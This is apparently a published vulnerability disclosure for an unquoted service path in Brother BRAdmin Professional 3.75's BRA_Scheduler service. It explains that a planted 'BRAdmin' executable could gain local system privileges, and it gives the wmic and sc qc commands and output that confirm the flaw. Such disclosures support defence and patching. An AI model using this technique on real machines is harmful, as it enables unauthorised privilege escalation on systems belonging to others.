# Exploit Title: BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path# Date: 2021-03-17# Exploit Author: Metin Yunus Kandemir# Vendor Homepage: https://global.brother/# Software Link: https://support.brother.com/g/b/downloadend.aspx?c=us&lang=en&prod=hls7000dn_us_eu_as&os=10013&dlid=dlf005042_000&flang=4&type3=26# Version: 3.75.0000# Tested on: Windows 10# Source: https://docs.unsafe-inline.com/0day/bradmin-professional-3.75-unquoted-service-path#Description:
This software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices.If a user can insert a executable which is called as "BRAdmin" under the "C:\Program Files (x86)\Brother\", local system privileges could be obtained by the user.#Detection of unquoted service path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto"| findstr /i /v "C:\Windows\\"| findstr /i "BRAdmin"|findstr /i /v """
Brother BRAdminPro Scheduler
BRA_Scheduler
C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
Auto
C:\>sc qc BRA_Scheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: BRA_Scheduler
TYPE : 10WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL: 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
LOAD_ORDER_GROUP :
TAG: 0
DISPLAY_NAME : Brother BRAdminPro Scheduler
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem